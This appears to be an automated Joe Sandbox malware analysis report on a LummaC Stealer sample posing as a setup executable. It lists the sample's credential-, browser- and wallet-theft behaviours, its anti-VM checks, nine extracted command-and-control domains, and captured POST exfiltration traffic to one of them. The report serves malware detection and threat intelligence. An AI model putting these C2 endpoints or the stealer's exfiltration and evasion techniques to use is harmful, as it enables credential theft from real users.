Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1st.Setup_patched.exe

Overview

General Information

Sample name:1st.Setup_patched.exe
Analysis ID:1664108
MD5:2154ece4944b0f4cba3f7d2e51b84ca3
SHA1:e0b92429b8fbca2f4ac6dbde773bd6c1aee0d720
SHA256:d469e0ee5af5bab895b2dd07f0808ce4c8bc959da5e39f3529b705e469eff268
Tags:de-pumpedexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1st.Setup_patched.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\1st.Setup_patched.exe" MD5: 2154ECE4944B0F4CBA3F7D2E51B84CA3)
  • cleanup
{"C2 url": ["winetersgard.digital/agbb", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "0c6b489a6b13a62212d66cc74988ee70017fee228bf6"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-13T17:06:28.154230+020020283713Unknown Traffic192.168.2.649691104.21.13.126443TCP
      2025-04-13T17:06:31.131004+020020283713Unknown Traffic192.168.2.649693104.21.13.126443TCP
      2025-04-13T17:06:33.577954+020020283713Unknown Traffic192.168.2.649694104.21.13.126443TCP
      2025-04-13T17:06:34.790472+020020283713Unknown Traffic192.168.2.649695104.21.13.126443TCP
      2025-04-13T17:06:38.799505+020020283713Unknown Traffic192.168.2.649696104.21.13.126443TCP
      2025-04-13T17:06:40.410690+020020283713Unknown Traffic192.168.2.649697104.21.13.126443TCP
      2025-04-13T17:06:42.814821+020020283713Unknown Traffic192.168.2.649698104.21.13.126443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["winetersgard.digital/agbb", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "0c6b489a6b13a62212d66cc74988ee70017fee228bf6"}
      Source: 1st.Setup_patched.exeVirustotal: Detection: 8%Perma Link
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: winetersgard.digital/agbb
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: jawdedmirror.run/ewqd
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: changeaie.top/geps
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: lonfgshadow.live/xawi
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: liftally.top/xasj
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: nighetwhisper.top/lekd
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: salaccgfa.top/gsooz
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: zestmodp.top/zeda
      Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmpString decryptor: owlflright.digital/qopy
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354F3B1 CryptUnprotectData,0_3_0354F3B1
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354A19B CryptUnprotectData,0_3_0354A19B
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0354F68D CryptUnprotectData,0_3_0354F68D
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0047A190 CryptGetHashParam,GetLastError,__CxxThrowException@8,CryptGetHashParam,0_2_0047A190
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0047A2D0 CryptGetHashParam,GetLastError,__CxxThrowException@8,CryptGetHashParam,0_2_0047A2D0
      Source: 1st.Setup_patched.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49691 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49693 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49694 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49695 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49696 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49697 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.126:443 -> 192.168.2.6:49698 version: TLS 1.2
      Source: 1st.Setup_patched.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\deploy\release\psi3\psi_32\cmake\apps\psi\RelWithDebInfo\psi.pdb source: 1st.Setup_patched.exe
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0047ABB0 FindClose,Sleep,FindFirstFileW,GetLastError,0_2_0047ABB0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F2D50 _wcspbrk,__getdrive,FindFirstFileExW,_wcspbrk,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,_free,___loctotime64_t,_free,__sopen_s,__fstat64,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,0_2_004F2D50
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_0048CDE0 FindFirstFileW,GetLastError,__CxxThrowException@8,FindNextFileW,0_2_0048CDE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then lea edx, dword ptr [ecx+eax]0_3_0355FAE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]0_3_035808D0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7229661Dh0_3_035800B0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then lea edx, dword ptr [eax-10h]0_3_03541748
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then mov eax, edx0_3_0357EF70
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2AF18DF6h]0_3_03574680
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then add ecx, eax0_3_03574680
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]0_3_035505B0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D397AED6h0_3_035505B0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]0_3_0357FCB0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_3_0357FCB0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000000D8h]0_3_03540B40
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20h]0_3_03579BD0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then mov dword ptr [esp+14h], eax0_3_0353F3F6
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-21043798h]0_3_0355EBE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+26025E6Bh]0_3_0354A3A3
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-0154764Eh]0_3_0357D250
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then mov word ptr [eax], cx0_3_03552270
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 91942B0Dh0_3_0354AA0B
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h0_3_03559230
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_3_0353CAC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]0_3_03580AC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_3_0353B2B0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then mov ecx, esi0_3_0354BAAF
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then push 00000020h0_3_0354D16C
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp word ptr [edi+ecx], 0000h0_3_03552969
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then add edx, FFFFFFFEh0_3_03575910
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]0_3_0357F850
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax]0_3_0357F850
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]0_3_03553815
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+679F28F4h]0_3_0357A810
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]0_3_03552E12
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+00h]0_3_0353A8C0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-48B40644h]0_3_03554F4C
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-48B40644h]0_3_03554965
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], FDD2FF0Ch0_3_035787F0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-6D8E8D46h]0_3_03540789
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+34h]0_3_0354AE42
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]0_3_03552E12
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]0_3_0357C620
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_3_03539EC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_3_03539EC0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+78h]0_3_0354FD50
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then mov edx, 00000001h0_3_03553565
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax+00h]0_3_03531DE0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+679F28F4h]0_3_035794F0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then movzx ecx, word ptr [ebx+eax]0_3_03553C80
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then mov dword ptr [esp+04h], ecx0_3_03553C80
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 4x nop then cmp word ptr [eax+ecx], 0000h0_3_0354DCB8

      Networking

      barindex
      Source: Malware configuration extractorURLs: winetersgard.digital/agbb
      Source: Malware configuration extractorURLs: jawdedmirror.run/ewqd
      Source: Malware configuration extractorURLs: changeaie.top/geps
      Source: Malware configuration extractorURLs: lonfgshadow.live/xawi
      Source: Malware configuration extractorURLs: liftally.top/xasj
      Source: Malware configuration extractorURLs: nighetwhisper.top/lekd
      Source: Malware configuration extractorURLs: salaccgfa.top/gsooz
      Source: Malware configuration extractorURLs: zestmodp.top/zeda
      Source: Malware configuration extractorURLs: owlflright.digital/qopy
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 104.21.13.126:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49696 -> 104.21.13.126:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49691 -> 104.21.13.126:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49693 -> 104.21.13.126:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49698 -> 104.21.13.126:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49697 -> 104.21.13.126:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49694 -> 104.21.13.126:443
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 53Host: winetersgard.digital
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YOpKtGMCUpnvdl5OrUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14916Host: winetersgard.digital
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I8l04pKGI9rn2pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15082Host: winetersgard.digital
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=70Cp7SfrnMWWUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19934Host: winetersgard.digital
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7Obr30h9KvMddt00User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2649Host: winetersgard.digital
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=h63S99l26bbMnl8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 589263Host: winetersgard.digital
      Source: global trafficHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 91Host: winetersgard.digital
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00434050 InternetReadFile,GetLastError,__CxxThrowException@8,__CxxThrowException@8,0_2_00434050
      Source: global trafficDNS traffic detected: DNS query: winetersgard.digital
      Source: unknownHTTP traffic detected: POST /agbb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 53Host: winetersgard.digital
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
      Source: 1st.Setup_patched.exe, 00000000.00000003.1457208726.00000000041DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1420807375.0000000004140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458946387.0000000001781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
      Source: 1st.Setup_patched.exeString found in binary or memory: https://psi.secunia.com/
      Source: 1st.Setup_patched.exeString found in binary or memory: https://psi3.s
      Source: 1st.Setup_patched.exeString found in binary or memory: https://psi3.secunia.com/
      Source: 1st.Setup_patched.exeString found in binary or memory: https://psi3.secunia.com/psi/30011/
      Source: 1st.Setup_patched.exeString found in binary or memory: https://psi3.secunia.com/psi/30011/index.htmlSecunia
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
      Source: 1st.Setup_patched.exe, 00000000.00000003.1458546143.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
      Source: 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/
      Source: 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/W
      Source: 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/Z
      Source: 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1537648643.000000000177B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbb
      Source: 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbb/
      Source: 1st.Setup_patched.exe, 00000000.00000003.1474118245.000000000177B000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1456572225.000000000177B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbb7
      Source: 1st.Setup_patched.exe, 00000000.00000003.1535126994.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547147907.000000000177E000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1537648643.000000000177B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbb93=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1443882229.000000000177C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbb=
      Source: 1st.Setup_patched.exe, 00000000.00000003.1509169903.00000000016F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbbP8
      Source: 1st.Setup_patched.exe, 00000000.00000003.1474118245.000000000177B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbbr
      Source: 1st.Setup_patched.exe, 00000000.00000002.1548173492.0000000001702000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547105385.0000000001700000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509985705.000000000177B000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547005847.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509779804.000000000177A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbbs
      Source: 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://winetersgard.digital/agbbw
